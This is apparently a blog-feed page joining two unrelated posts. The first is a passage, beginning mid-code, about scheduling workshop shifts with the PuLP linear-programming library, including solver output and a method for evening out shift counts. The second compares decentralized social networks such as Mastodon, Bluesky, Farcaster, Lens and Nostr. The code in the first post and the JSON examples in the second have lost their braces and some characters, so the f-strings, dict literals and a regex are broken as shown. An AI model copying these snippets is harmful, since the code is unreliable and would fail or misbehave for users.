           'BOB':   'NEUTRAL',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'REFUSED',
           'DAVID': 'REFUSED' ,
          'SATURDAY - PAINTING 2:00 PM - 9:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'EVE':   'REFUSED',
           'GRACE': 'REFUSED',
           'DAVID': 'REFUSED' 
availabilities = ['PREFERRED', 'NEUTRAL', 'DISFAVORED']
import pulp
prob = pulp.LpProblem("Scheduling", pulp.LpMaximize)
vars = pulp.LpVariable.dicts("Assignments",
                             (humans, shifts.keys()),
                             None,None, # bounds; unused, since these are binary variables
                             pulp.LpBinary)
# Everyone works at least 2 shifts
Nshifts_min = 2
for h in humans:
    prob += (
        pulp.lpSum([vars[h][s] for s in shifts.keys()]) >= Nshifts_min,
        f" h  works at least  Nshifts_min  shifts",
    )
# each shift is ~ 8 hours, so I limit everyone to 40/8 = 5 shifts
Nshifts_max = 5
for h in humans:
    prob += (
        pulp.lpSum([vars[h][s] for s in shifts.keys()]) <= Nshifts_max,
        f" h  works at most  Nshifts_max  shifts",
    )
# all shifts staffed and not double-staffed
for s in shifts.keys():
    prob += (
        pulp.lpSum([vars[h][s] for h in humans]) == 1,
        f" s  is staffed",
    )
# each human can work at most one shift on any given day
for w in days_of_week:
    for h in humans:
        prob += (
            pulp.lpSum([vars[h][s] for s in shifts.keys() if re.match(rf' w  ',s)]) <= 1,
            f" h  cannot be double-booked on  w "
        )
#### Some explicit constraints; as an example
# DAVID can't work any PAINTING shift and is off on Thu and Sun
h = 'DAVID'
prob += (
    pulp.lpSum([vars[h][s] for s in shifts.keys() if re.search(r'- PAINTING',s)]) == 0,
    f" h  can't work any PAINTING shift"
)
prob += (
    pulp.lpSum([vars[h][s] for s in shifts.keys() if re.match(r'THURSDAY SUNDAY',s)]) == 0,
    f" h  is off on Thursday and Sunday"
)
# Do not assign any "REFUSED" shifts
for s in shifts.keys():
    for h in humans:
        if shifts[s][h] == 'REFUSED':
            prob += (
                vars[h][s] == 0,
                f" h  is not available for  s "
            )
# Objective. I try to maximize the "happiness". Each human sees each shift as
# one of:
#
#   PREFERRED
#   NEUTRAL
#   DISFAVORED
#   REFUSED
#
# I set a hard constraint to handle "REFUSED", and arbitrarily, I set these
# benefit values for the others
benefit_availability = dict()
benefit_availability['PREFERRED']  = 3
benefit_availability['NEUTRAL']    = 2
benefit_availability['DISFAVORED'] = 1
# Not used, since this is a hard constraint. But the code needs this to be a
# part of the benefit. I can ignore these in the code, but let's keep this
# simple
benefit_availability['REFUSED' ] = -1000
benefits = dict()
for h in humans:
    benefits[h] = \
        pulp.lpSum([vars[h][s] * benefit_availability[shifts[s][h]] \
                    for s in shifts.keys()])
benefit_total = \
    pulp.lpSum([benefits[h] \
                for h in humans])
prob += (
    benefit_total,
    "happiness",
)
prob.solve()
if pulp.LpStatus[prob.status] == "Optimal":
    report_solution_to_console(vars)
    report_solution_summary_to_console(vars)
The set of workers is in the humans variable, and the shift schedule and the workers' preferences are encoded in the shifts dict. The problem is defined by a vars dict of dicts, each a boolean variable indicating whether a particular worker is scheduled for a particular shift. We define a set of constraints to these worker allocations to restrict ourselves to valid solutions. And among these valid solutions, we try to find the one that maximizes some benefit function, defined here as:
benefit_availability = dict()
benefit_availability['PREFERRED']  = 3
benefit_availability['NEUTRAL']    = 2
benefit_availability['DISFAVORED'] = 1
benefits = dict()
for h in humans:
    benefits[h] = \
        pulp.lpSum([vars[h][s] * benefit_availability[shifts[s][h]] \
                    for s in shifts.keys()])
benefit_total = \
    pulp.lpSum([benefits[h] \
                for h in humans])
So for instance each shift that was scheduled as somebody's PREFERRED shift gives us 3 benefit points. And if all the shifts ended up being PREFERRED, we'd have a total benefit value of 3*Nshifts. This is impossible, however, because that would violate some constraints in the problem. The exact trade-off between the different preferences is set in the benefit_availability dict. With the above numbers, it's equally good for somebody to have a NEUTRAL shift and a day off as it is for them to have DISFAVORED shifts. If we really want to encourage the program to work people as much as possible (days off discouraged), we'd want to raise the DISFAVORED threshold. I run this program and I get:
....
Result - Optimal solution found
Objective value:                108.00000000
Enumerated nodes:               0
Total iterations:               0
Time (CPU seconds):             0.01
Time (Wallclock seconds):       0.01
Option for printingOptions changed from normal to all
Total time (CPU seconds):       0.02   (Wallclock seconds):       0.02
SUNDAY
    ---- SANDING 9:00 AM - 4:00 PM
         EVE (PREFERRED)
    ---- SAWING 9:00 AM - 4:00 PM
         IVAN (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM
         FRANK (PREFERRED)
    ---- PAINTING 11:00 AM - 6:00 PM
         HEIDI (PREFERRED)
    ---- SAWING 12:00 PM - 7:00 PM
         ALICE (PREFERRED)
    ---- PAINTING 12:15 PM - 7:15 PM
         CAROL (PREFERRED)
MONDAY
    ---- SAWING 9:00 AM - 4:00 PM
         DAVID (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM
         IVAN (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM
         GRACE (PREFERRED)
    ---- SAWING 2:00 PM - 9:00 PM
         ALICE (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM
         HEIDI (NEUTRAL)
TUESDAY
    ---- SAWING 9:00 AM - 4:00 PM
         DAVID (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM
         EVE (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM
         FRANK (NEUTRAL)
    ---- SAWING 2:00 PM - 9:00 PM
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM
         HEIDI (NEUTRAL)
WEDNESDAY
    ---- SAWING 7:30 AM - 2:30 PM
         DAVID (PREFERRED)
    ---- PAINTING 7:30 AM - 2:30 PM
         IVAN (PREFERRED)
    ---- SANDING 9:45 AM - 4:45 PM
         FRANK (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM
         JUDY (PREFERRED)
    ---- SAWING 2:00 PM - 9:00 PM
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM
         ALICE (NEUTRAL)
THURSDAY
    ---- SANDING 9:00 AM - 4:00 PM
         GRACE (PREFERRED)
    ---- SAWING 9:00 AM - 4:00 PM
         CAROL (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM
         EVE (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM
         JUDY (PREFERRED)
    ---- SAWING 2:00 PM - 9:00 PM
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM
         ALICE (NEUTRAL)
FRIDAY
    ---- SAWING 9:00 AM - 4:00 PM
         DAVID (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM
         FRANK (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM
         GRACE (NEUTRAL)
    ---- SAWING 2:00 PM - 9:00 PM
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM
         HEIDI (NEUTRAL)
SATURDAY
    ---- SAWING 7:30 AM - 2:30 PM
         CAROL (PREFERRED)
    ---- PAINTING 7:30 AM - 2:30 PM
         IVAN (PREFERRED)
    ---- SANDING 9:45 AM - 4:45 PM
         DAVID (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM
         FRANK (NEUTRAL)
    ---- SAWING 2:00 PM - 9:00 PM
         ALICE (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM
         BOB (NEUTRAL)
SUMMARY
-- ALICE
   benefit: 13.000
   3 PREFERRED
   2 NEUTRAL
   0 DISFAVORED
-- BOB
   benefit: 14.000
   4 PREFERRED
   1 NEUTRAL
   0 DISFAVORED
-- CAROL
   benefit: 9.000
   3 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- DAVID
   benefit: 15.000
   5 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- EVE
   benefit: 9.000
   3 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- FRANK
   benefit: 13.000
   3 PREFERRED
   2 NEUTRAL
   0 DISFAVORED
-- GRACE
   benefit: 8.000
   2 PREFERRED
   1 NEUTRAL
   0 DISFAVORED
-- HEIDI
   benefit: 9.000
   1 PREFERRED
   3 NEUTRAL
   0 DISFAVORED
-- IVAN
   benefit: 12.000
   4 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- JUDY
   benefit: 6.000
   2 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
So we have a solution! We have 108 total benefit points. But it looks a bit uneven: Judy only works 2 days, while some people work many more: David works 5 for instance. Why is that? I update the program with =human_annotate = 'JUDY'=, run it again, and it tells me more about Judy's preferences:
Objective value:                108.00000000
Enumerated nodes:               0
Total iterations:               0
Time (CPU seconds):             0.01
Time (Wallclock seconds):       0.01
Option for printingOptions changed from normal to all
Total time (CPU seconds):       0.01   (Wallclock seconds):       0.02
SUNDAY (JUDY OFF)
    ---- SANDING 9:00 AM - 4:00 PM (JUDY NEUTRAL)
         EVE (PREFERRED)
    ---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED)
         IVAN (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM (JUDY PREFERRED)
         FRANK (PREFERRED)
    ---- PAINTING 11:00 AM - 6:00 PM (JUDY NEUTRAL)
         HEIDI (PREFERRED)
    ---- SAWING 12:00 PM - 7:00 PM (JUDY PREFERRED)
         ALICE (PREFERRED)
    ---- PAINTING 12:15 PM - 7:15 PM (JUDY NEUTRAL)
         CAROL (PREFERRED)
MONDAY (JUDY OFF)
    ---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED)
         DAVID (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM (JUDY NEUTRAL)
         IVAN (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM (JUDY NEUTRAL)
         GRACE (PREFERRED)
    ---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         ALICE (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         HEIDI (NEUTRAL)
TUESDAY (JUDY OFF)
    ---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED)
         DAVID (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM (JUDY PREFERRED)
         EVE (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM (JUDY REFUSED)
         FRANK (NEUTRAL)
    ---- SAWING 2:00 PM - 9:00 PM (JUDY REFUSED)
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM (JUDY REFUSED)
         HEIDI (NEUTRAL)
WEDNESDAY (JUDY SCHEDULED)
    ---- SAWING 7:30 AM - 2:30 PM (JUDY REFUSED)
         DAVID (PREFERRED)
    ---- PAINTING 7:30 AM - 2:30 PM (JUDY REFUSED)
         IVAN (PREFERRED)
    ---- SANDING 9:45 AM - 4:45 PM (JUDY NEUTRAL)
         FRANK (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM (JUDY PREFERRED)
         JUDY (PREFERRED)
    ---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         ALICE (NEUTRAL)
THURSDAY (JUDY SCHEDULED)
    ---- SANDING 9:00 AM - 4:00 PM (JUDY PREFERRED)
         GRACE (PREFERRED)
    ---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED)
         CAROL (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM (JUDY PREFERRED)
         EVE (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM (JUDY PREFERRED)
         JUDY (PREFERRED)
    ---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         ALICE (NEUTRAL)
FRIDAY (JUDY OFF)
    ---- SAWING 9:00 AM - 4:00 PM (JUDY DISFAVORED)
         DAVID (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM (JUDY DISFAVORED)
         FRANK (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM (JUDY DISFAVORED)
         GRACE (NEUTRAL)
    ---- SAWING 2:00 PM - 9:00 PM (JUDY REFUSED)
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM (JUDY REFUSED)
         HEIDI (NEUTRAL)
SATURDAY (JUDY OFF)
    ---- SAWING 7:30 AM - 2:30 PM (JUDY REFUSED)
         CAROL (PREFERRED)
    ---- PAINTING 7:30 AM - 2:30 PM (JUDY REFUSED)
         IVAN (PREFERRED)
    ---- SANDING 9:45 AM - 4:45 PM (JUDY REFUSED)
         DAVID (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM (JUDY DISFAVORED)
         FRANK (NEUTRAL)
    ---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         ALICE (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         BOB (NEUTRAL)
SUMMARY
-- ALICE
   benefit: 13.000
   3 PREFERRED
   2 NEUTRAL
   0 DISFAVORED
-- BOB
   benefit: 14.000
   4 PREFERRED
   1 NEUTRAL
   0 DISFAVORED
-- CAROL
   benefit: 9.000
   3 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- DAVID
   benefit: 15.000
   5 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- EVE
   benefit: 9.000
   3 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- FRANK
   benefit: 13.000
   3 PREFERRED
   2 NEUTRAL
   0 DISFAVORED
-- GRACE
   benefit: 8.000
   2 PREFERRED
   1 NEUTRAL
   0 DISFAVORED
-- HEIDI
   benefit: 9.000
   1 PREFERRED
   3 NEUTRAL
   0 DISFAVORED
-- IVAN
   benefit: 12.000
   4 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- JUDY
   benefit: 6.000
   2 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
This tells us that on Monday Judy does not work, although she marked the SAWING shift as PREFERRED. Instead David got that shift. What would happen if David gave that shift to Judy? He would lose 3 points, she would gain 3 points, and the total would remain exactly the same at 108. How would we favor a more even distribution? We need some sort of tie-break. I want to add a nonlinearity to strongly disfavor people getting a low number of shifts. But PuLP is very explicitly a linear programming solver, and cannot solve nonlinear problems. Here we can get around this by enumerating each specific case, and assigning it a nonlinear benefit function. The most obvious approach is to define another set of boolean variables: vars_Nshifts[human][N]. And then using them to add extra benefit terms, with values nonlinearly related to Nshifts. Something like this:
benefit_boost_Nshifts = \
     2: -0.8,
     3: -0.5,
     4: -0.3,
     5: -0.2 
for h in humans:
    benefits[h] = \
        ... + \
        pulp.lpSum([vars_Nshifts[h][n] * benefit_boost_Nshifts[n] \
                    for n in benefit_boost_Nshifts.keys()])
So in the previous example we considered giving David's 5th shift to Judy, for her 3rd shift. In that scenario, David's extra benefit would change from -0.2 to -0.3 (a shift of -0.1), while Judy's would change from -0.8 to -0.5 (a shift of +0.3). So the balancing out the shifts in this way would work: the solver would favor the solution with the higher benefit function. Great. In order for this to work, we need the vars_Nshifts[human][N] variables to function as intended: they need to be binary indicators of whether a specific person has that many shifts or not. That would need to be implemented with constraints. Let's plot it like this:
#!/usr/bin/python3
import numpy as np
import gnuplotlib as gp
Nshifts_eq  = 4
Nshifts_max = 10
Nshifts = np.arange(Nshifts_max+1)
i0 = np.nonzero(Nshifts != Nshifts_eq)[0]
i1 = np.nonzero(Nshifts == Nshifts_eq)[0]
gp.plot( # True value: var_Nshifts4==0, Nshifts!=4
         ( np.zeros(i0.shape),
           Nshifts[i0],
           dict(_with     = 'points pt 7 ps 1 lc "red"') ),
         # True value: var_Nshifts4==1, Nshifts==4
         ( np.ones(i1.shape),
           Nshifts[i1],
           dict(_with     = 'points pt 7 ps 1 lc "red"') ),
         # False value: var_Nshifts4==1, Nshifts!=4
         ( np.ones(i0.shape),
           Nshifts[i0],
           dict(_with     = 'points pt 7 ps 1 lc "black"') ),
         # False value: var_Nshifts4==0, Nshifts==4
         ( np.zeros(i1.shape),
           Nshifts[i1],
           dict(_with     = 'points pt 7 ps 1 lc "black"') ),
        unset=('grid'),
        _set = (f'xtics ("(Nshifts== Nshifts_eq ) == 0" 0, "(Nshifts== Nshifts_eq ) == 1" 1)'),
        _xrange = (-0.1, 1.1),
        ylabel = "Nshifts",
        title = "Nshifts equality variable: not linearly separable",
        hardcopy = "/tmp/scheduling-Nshifts-eq.svg")
scheduling-Nshifts-eq.svg
So a hypothetical vars_Nshifts[h][4] variable (plotted on the x axis of this plot) would need to be defined by a set of linear AND constraints to linearly separate the true (red) values of this variable from the false (black) values. As can be seen in this plot, this isn't possible. So this representation does not work. How do we fix it? We can use inequality variables instead. I define a different set of variables vars_Nshifts_leq[human][N] that are 1 iff Nshifts <= N. The equality variable from before can be expressed as a difference of these inequality variables: vars_Nshifts[human][N] = vars_Nshifts_leq[human][N]-vars_Nshifts_leq[human][N-1] Can these vars_Nshifts_leq variables be defined by a set of linear AND constraints? Yes:
#!/usr/bin/python3
import numpy as np
import numpysane as nps
import gnuplotlib as gp
Nshifts_leq = 4
Nshifts_max = 10
Nshifts = np.arange(Nshifts_max+1)
i0 = np.nonzero(Nshifts >  Nshifts_leq)[0]
i1 = np.nonzero(Nshifts <= Nshifts_leq)[0]
def linear_slope_yintercept(xy0,xy1):
    m = (xy1[1] - xy0[1])/(xy1[0] - xy0[0])
    b = xy1[1] - m * xy1[0]
    return np.array(( m, b ))
x01     = np.arange(2)
x01_one = nps.glue( nps.transpose(x01), np.ones((2,1)), axis=-1)
y_lowerbound = nps.inner(x01_one,
                         linear_slope_yintercept( np.array((0, Nshifts_leq+1)),
                                                  np.array((1, 0)) ))
y_upperbound = nps.inner(x01_one,
                         linear_slope_yintercept( np.array((0, Nshifts_max)),
                                                  np.array((1, Nshifts_leq)) ))
y_lowerbound_check = (1-x01) * (Nshifts_leq+1)
y_upperbound_check = Nshifts_max - x01*(Nshifts_max-Nshifts_leq)
gp.plot( # True value: var_Nshifts_leq4==0, Nshifts>4
         ( np.zeros(i0.shape),
           Nshifts[i0],
           dict(_with     = 'points pt 7 ps 1 lc "red"') ),
         # True value: var_Nshifts_leq4==1, Nshifts<=4
         ( np.ones(i1.shape),
           Nshifts[i1],
           dict(_with     = 'points pt 7 ps 1 lc "red"') ),
         # False value: var_Nshifts_leq4==1, Nshifts>4
         ( np.ones(i0.shape),
           Nshifts[i0],
           dict(_with     = 'points pt 7 ps 1 lc "black"') ),
         # False value: var_Nshifts_leq4==0, Nshifts<=4
         ( np.zeros(i1.shape),
           Nshifts[i1],
           dict(_with     = 'points pt 7 ps 1 lc "black"') ),
         ( x01, y_lowerbound, y_upperbound,
           dict( _with     = 'filledcurves lc "green"',
                 tuplesize = 3) ),
         ( x01, nps.cat(y_lowerbound_check, y_upperbound_check),
           dict( _with     = 'lines lc "green" lw 2',
                 tuplesize = 2) ),
        unset=('grid'),
        _set = (f'xtics ("(Nshifts<= Nshifts_leq ) == 0" 0, "(Nshifts<= Nshifts_leq ) == 1" 1)',
                'style fill transparent pattern 1'),
        _xrange = (-0.1, 1.1),
        ylabel = "Nshifts",
        title = "Nshifts inequality variable: linearly separable",
        hardcopy = "/tmp/scheduling-Nshifts-leq.svg")
scheduling-Nshifts-leq.svg
So we can use two linear constraints to make each of these variables work properly. To use these in the benefit function we can use the equality constraint expression from above, or we can use these directly:
# I want to favor people getting more extra shifts at the start to balance
# things out: somebody getting one more shift on their pile shouldn't take
# shifts away from under-utilized people
benefit_boost_leq_bound = \
     2: .2,
     3: .3,
     4: .4,
     5: .5 
# Constrain vars_Nshifts_leq variables to do the right thing
for h in humans:
    for b in benefit_boost_leq_bound.keys():
        prob += (pulp.lpSum([vars[h][s] for s in shifts.keys()])
                 >= (1 - vars_Nshifts_leq[h][b])*(b+1),
                 f" h  at least  b  shifts: lower bound")
        prob += (pulp.lpSum([vars[h][s] for s in shifts.keys()])
                 <= Nshifts_max - vars_Nshifts_leq[h][b]*(Nshifts_max-b),
                 f" h  at least  b  shifts: upper bound")
benefits = dict()
for h in humans:
    benefits[h] = \
        ... + \
        pulp.lpSum([vars_Nshifts_leq[h][b] * benefit_boost_leq_bound[b] \
                    for b in benefit_boost_leq_bound.keys()])
In this scenario, David would get a boost of 0.4 from giving up his 5th shift, while Judy would lose a boost of 0.2 from getting her 3rd, for a net gain of 0.2 benefit points. The exact numbers will need to be adjusted on a case by case basis, but this works. The full program, with this and other extra features is available here.

Otto Kek l inen: Will decentralized social media soon go mainstream?

Featured image of post Will decentralized social media soon go mainstream?In today s digital landscape, social media is more than just a communication tool it is the primary medium for global discourse. Heads of state, corporate leaders and cultural influencers now broadcast their statements directly to the world, shaping public opinion in real time. However, the dominance of a few centralized platforms X/Twitter, Facebook and YouTube raises critical concerns about control, censorship and the monopolization of information. Those who control these networks effectively wield significant power over public discourse. In response, a new wave of distributed social media platforms has emerged, each built on different decentralized protocols designed to provide greater autonomy, censorship resistance and user control. While Wikipedia maintains a comprehensive list of distributed social networking software and protocols, it does not cover recent blockchain-based systems, nor does it highlight which have the most potential for mainstream adoption. This post explores the leading decentralized social media platforms and the protocols they are based on: Mastodon (ActivityPub), Bluesky (AT Protocol), Warpcast (Farcaster), Hey (Lens) and Primal (Nostr).

Comparison of architecture and mainstream adoption potential
Protocol Identity System Example Storage model Cost for end users Potential
Mastodon Tied to server domain @ottok@mastodon.social Federated instances Free (some instances charge) High
Bluesky Portable (DID) ottoke.bsky.social Federated instances Free Moderate
Farcaster ENS (Ethereum) @ottok Blockchain + off-chain Small gas fees Moderate
Lens NFT-based (Polygon) @ottok Blockchain + off-chain Small gas fees Niche
Nostr Cryptographic Keys npub16lc6uhqpg6dnqajylkhwuh3j7ynhcnje508tt4v6703w9kjlv9vqzz4z7f Federated instances Free (some instances charge) Niche

1. Mastodon (ActivityPub) Screenshot of Mastodon Mastodon was created in 2016 by Eugen Rochko, a German software developer who sought to provide a decentralized and user-controlled alternative to Twitter. It was built on the ActivityPub protocol, now standardized by W3C Social Web Working Group, to allow users to join independent servers while still communicating across the broader Mastodon network. Mastodon operates on a federated model, where multiple independently run servers communicate via ActivityPub. Each server sets its own moderation policies, leading to a decentralized but fragmented experience. The servers can alternatively be called instances, relays or nodes, depending on what vocabulary a protocol has standardized on.
  • Identity: User identity is tied to the instance where they registered, represented as @username@instance.tld.
  • Storage: Data is stored on individual instances, which federate messages to other instances based on their configurations.
  • Cost: Free to use, but relies on instance operators willing to run the servers.
The protocol defines multiple activities such as:
  • Creating a post
  • Liking
  • Sharing
  • Following
  • Commenting

Example Message in ActivityPub (JSON-LD Format)
json
 
 "@context": "https://www.w3.org/ns/activitystreams",
 "type": "Create",
 "actor": "https://mastodon.social/users/ottok",
 "object":  
 "type": "Note",
 "content": "Hello from #Mastodon!",
 "published": "2025-03-03T12:00:00Z",
 "to": ["https://www.w3.org/ns/activitystreams#Public"]
  
 
Servers communicate across different platforms by publishing activities to their followers or forwarding activities between servers. Standard HTTPS is used between servers for communication, and the messages use JSON-LD for data representation. The WebFinger protocol is used for user discovery. There is however no neat way for home server discovery yet. This means that if you are browsing e.g. Fosstodon and want to follow a user and press Follow, a dialog will pop up asking you to enter your own home server (e.g. mastodon.social) to redirect you there for actually executing the Follow action on with your account. Mastodon is open source under the AGPL at github.com/mastodon/mastodon. Anyone can operate their own instance. It just requires to run your own server and some skills to maintain a Ruby on Rails app with a PostgreSQL database backend, and basic understanding of the protocol to configure federation with other ActivityPub instances.

Popularity: Already established, but will it grow more? Mastodon has seen steady growth, especially after Twitter s acquisition in 2022, with some estimates stating it peaked at 10 million users across thousands of instances. However, its fragmented user experience and the complexity of choosing instances have hindered mainstream adoption. Still, it remains the most established decentralized alternative to Twitter. Note that Donald Trump s Truth Social is based on the Mastodon software but does not federate with the ActivityPub network. The ActivityPub protocol is the most widely used of its kind. One of the other most popular services is the Lemmy link sharing service, similar to Reddit. The larger ecosystem of ActivityPub is called Fediverse, and estimates put the total active user count around 6 million.

2. Bluesky (AT Protocol) Screenshot of Bluesky Interestingly, Bluesky was conceived within Twitter in 2019 by Twitter founder Jack Dorsey. After being incubated as a Twitter-funded project, it spun off as an independent Public Benefit LLC in February 2022 and launched its public beta in February 2023. Bluesky runs on top of the Authenticated Transfer (AT) Protocol published at https://github.com/bluesky-social/atproto. The protocol enables portable identities and data ownership, meaning users can migrate between platforms while keeping their identity and content intact. In practice, however, there is only one popular server at the moment, which is Bluesky itself.
  • Identity: Usernames are domain-based (e.g., @user.bsky.social).
  • Storage: Content is theoretically federated among various servers.
  • Cost: Free to use, but relies on instance operators willing to run the servers.

Example Message in AT Protocol (JSON Format)
json
 
 "repo": "did:plc:ottoke.bsky.social",
 "collection": "app.bsky.feed.post",
 "record":  
 "$type": "app.bsky.feed.post",
 "text": "Hello from Bluesky!",
 "createdAt": "2025-03-03T12:00:00Z",
 "langs": ["en"]
  
 

Popularity: Hybrid approach may have business benefits? Bluesky reported over 3 million users by 2024, probably getting traction due to its Twitter-like interface and Jack Dorsey s involvement. Its hybrid approach decentralized identity with centralized components could make it a strong candidate for mainstream adoption, assuming it can scale effectively.

3. Warpcast (Farcaster Network) Farcaster was launched in 2021 by Dan Romero and Varun Srinivasan, both former crypto exchange Coinbase executives, to create a decentralized but user-friendly social network. Built on the Ethereum blockchain, it could potentially offer a very attack-resistant communication medium. However, in my own testing, Farcaster does not seem to fully leverage what Ethereum could offer. First of all, there is no diversity in programs implementing the protocol as at the moment there is only Warpcast. In Warpcast the signup requires an initial 5 USD fee that is not payable in ETH, and users need to create a new wallet address on the Ethereum layer 2 network Base instead of simply reusing their existing Ethereum wallet address or ENS name. Despite this, I can understand why Farcaster may have decided to start out like this. Having a single client program may be the best strategy initially. One of the decentralized chat protocol Matrix founders, Matthew Hodgson, shared in his FOSDEM 2025 talk that he slightly regrets focusing too much on developing the protocol instead of making sure the app to use it is attractive to end users. So it may be sensible to ensure Warpcast gets popular first, before attempting to make the Farcaster protocol widely used. As a protocol Farcaster s hybrid approach makes it more scalable than fully on-chain networks, giving it a higher chance of mainstream adoption if it integrates seamlessly with broader Web3 ecosystems.
  • Identity: ENS (Ethereum Name Service) domains are used as usernames.
  • Storage: Messages are stored in off-chain hubs, while identity is on-chain.
  • Cost: Users must pay gas fees for some operations but reading and posting messages is mostly free.

Example Message in Farcaster (JSON Format)
json
 
 "fid": 766579,
 "username": "ottok",
 "custodyAddress": "0x127853e48be3870172baa4215d63b6d815d18f21",
 "connectedWallet": "0x3ebe43aa3ae5b891ca1577d9c49563c0cee8da88",
 "text": "Hello from Farcaster!",
 "publishedAt": 1709424000,
 "replyTo": null,
 "embeds": []
 

Popularity: Decentralized social media + decentralized payments a winning combo? Ethereum founder Vitalik Buterin (warpcast.com/vbuterin) and many core developers are active on the platform. Warpcast, the main client for Farcaster, has seen increasing adoption, especially among Ethereum developers and Web3 enthusiasts. I too have an profile at warpcast.com/ottok. However, the numbers are still very low and far from reaching network effects to really take off. Blockchain-based social media networks, particularly those built on Ethereum, are compelling because they leverage existing user wallets and persistent identities while enabling native payment functionality. When combined with decentralized content funding through micropayments, these blockchain-backed social networks could offer unique advantages that centralized platforms may find difficult to replicate, being decentralized both as a technical network and in a funding mechanism.

4. Hey.xyz (Lens Network) The Lens Protocol was developed by decentralized finance (DeFi) team Aave and launched in May 2022 to provide a user-owned social media network. While initially built on Polygon, it has since launched its own Layer 2 network called the Lens Network in February 2024. Lens is currently the main competitor to Farcaster. Lens stores profile ownership and references on-chain, while content is stored on IPFS/Arweave, enabling composability with DeFi and NFTs.
  • Identity: Profile ownership is tied to NFTs on the Polygon blockchain.
  • Storage: Content is on-chain and integrates with IPFS/Arweave (like NFTs).
  • Cost: Users must pay gas fees for some operations but reading and posting messages is mostly free.

Example Message in Lens (JSON Format)
json
 
 "profileId": "@ottok",
 "contentURI": "ar://QmExampleHash",
 "collectModule": "0x23b9467334bEb345aAa6fd1545538F3d54436e96",
 "referenceModule": "0x0000000000000000000000000000000000000000",
 "timestamp": 1709558400
 

Popularity: Probably not as social media site, but maybe as protocol? The social media side of Lens is mainly the Hey.xyz website, which seems to have fewer users than Warpcast, and is even further away from reaching critical mass for network effects. The Lens protocol however has a lot of advanced features and it may gain adoption as the building block for many Web3 apps.

5. Primal.net (Nostr Network) Nostr (Notes and Other Stuff Transmitted by Relays) was conceptualized in 2020 by an anonymous developer known as fiatjaf. One of the primary design tenets was to be a censorship-resistant protocol and it is popular among Bitcoin enthusiasts, with Jack Dorsey being one of the public supporters. Unlike the Farcaster and Lens protocols, Nostr is not blockchain-based but just a network of relay servers for message distribution. If does however use public key cryptography for identities, similar to how wallets work in crypto.
  • Identity: Public-private key pairs define identity (with prefix npub...).
  • Storage: Content is federated among multiple servers, which in Nostr vocabulary are called relays.
  • Cost: No gas fees, but relies on relay operators willing to run the servers.

Example Message in Nostr (JSON Format)
json
 
 "id": "note1xyz...",
 "pubkey": "npub1...",
 "kind": 1,
 "content": "Hello from Nostr!",
 "created_at": 1709558400,
 "tags": [],
 "sig": "sig1..."
 

Popularity: If Jack Dorsey and Bitcoiners promote it enough? Primal.net as a web app is pretty solid, but it does not stand out much. While Jack Dorsey has shown support by donating $1.5 million to the protocol development in December 2021, its success likely depends on broader adoption by the Bitcoin community.

